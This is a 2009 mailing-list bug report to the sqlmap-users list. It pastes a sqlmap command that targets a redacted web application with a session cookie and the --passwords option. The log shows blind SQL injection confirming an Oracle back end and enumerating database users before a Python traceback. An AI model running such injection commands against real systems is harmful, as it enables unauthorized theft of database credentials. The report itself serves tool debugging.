[sqlmap-users] sqlmap error message
Brought to you by:
inquisb
From: Jeroen v. B. <je...@de...> - 2009-12-22 08:46:56
|
Hi, Below you'll find a sqlmap error message: //---------------------------------------------------------------------------- D:\sqlmap-0.7_exe>sqlmap.exe -u "https://****/****/****.do?p=2&****=0&rowsp erpage=20&order_by=UPPER_NAME&asc_desc=ASC&responsibility=%2B" --cookie "JSESSIONID=****;" -p **** --passwords sqlmap/0.7 by Bernardo Damele A. G. <ber...@gm...> [*] starting at: 16:25:42 [16:25:42] [WARNING] the testable parameter '****' you provided is not into the Cookie [16:25:42] [INFO] testing connection to the target url [16:25:43] [INFO] testing if the url is stable, wait a few seconds [16:25:48] [INFO] url is stable [16:25:48] [INFO] testing sql injection on GET parameter '****' with 0 parenthesis [16:25:48] [INFO] testing unescaped numeric injection on GET parameter '****' [16:26:11] [INFO] confirming unescaped numeric injection on GET parameter '****' [16:26:16] [INFO] GET parameter '****' is unescaped numeric injectable with 0 parenthesis [16:26:16] [INFO] testing for parenthesis on injectable parameter [16:26:35] [INFO] the injectable parameter requires 0 parenthesis [16:26:35] [INFO] testing MySQL [16:26:41] [WARNING] the back-end DMBS is not MySQL [16:26:41] [INFO] testing Oracle [16:26:58] [INFO] confirming Oracle [16:27:17] [INFO] the back-end DBMS is Oracle back-end DBMS: Oracle [16:27:17] [INFO] fetching database users password hashes [16:27:17] [INFO] fetching database users [16:27:17] [INFO] fetching number of database users [16:27:17] [INFO] retrieved: 92 [16:29:32] [INFO] retrieved: CTXSYS [16:40:04] [INFO] retrieved: EXFSYS <50 lines removed> [03:02:00] [INFO] retrieved: PN [03:07:59] [ERROR] unhandled exception in sqlmap/0.7, please copy the command line and th e following text and send by e-mail to sql...@li.... The developer will fix it as soon as possible : sqlmap version: 0.7 Python version: 2.6.1 Operating system: win32 Traceback (most recent call last): File "sqlmap.py", line 84, in main File "lib\controller\controller.pyc", line 263, in start File "lib\controller\action.pyc", line 101, in action File "plugins\generic\enumeration.pyc", line 277, in getPasswordHashes File "plugins\generic\enumeration.pyc", line 210, in getUsers File "lib\request\inject.pyc", line 378, in getValue File "lib\request\inject.pyc", line 308, in __goInferenceProxy File "lib\request\inject.pyc", line 99, in __goInferenceFields File "lib\request\inject.pyc", line 58, in __goInference File "lib\techniques\blind\inference.pyc", line 232, in bisection File "lib\techniques\blind\inference.pyc", line 106, in getChar File "lib\request\connect.pyc", line 274, in queryPage File "lib\request\connect.pyc", line 197, in getPage UnboundLocalError: local variable 'warnMsg' referenced before assignment [*] shutting down at: 03:07:59 //---------------------------------------------------------------------------- The problem might (I'm not sure) have something to do with the sessionID since it was expired when I checked it the next morning. I also mentioned that a number of functions is not (yet) implemented for Oracle databases. I used to do lots of Oracle pentests in the past and wrote lots of tools including support for command execution on Oracle (with Java enabled) and password crackers <http://www.thc.org/thc-orakelcrackert11g> <http://www.thc.org/thc-orakel>. Please let me know if help is appreciated. Cheers, Jeroen |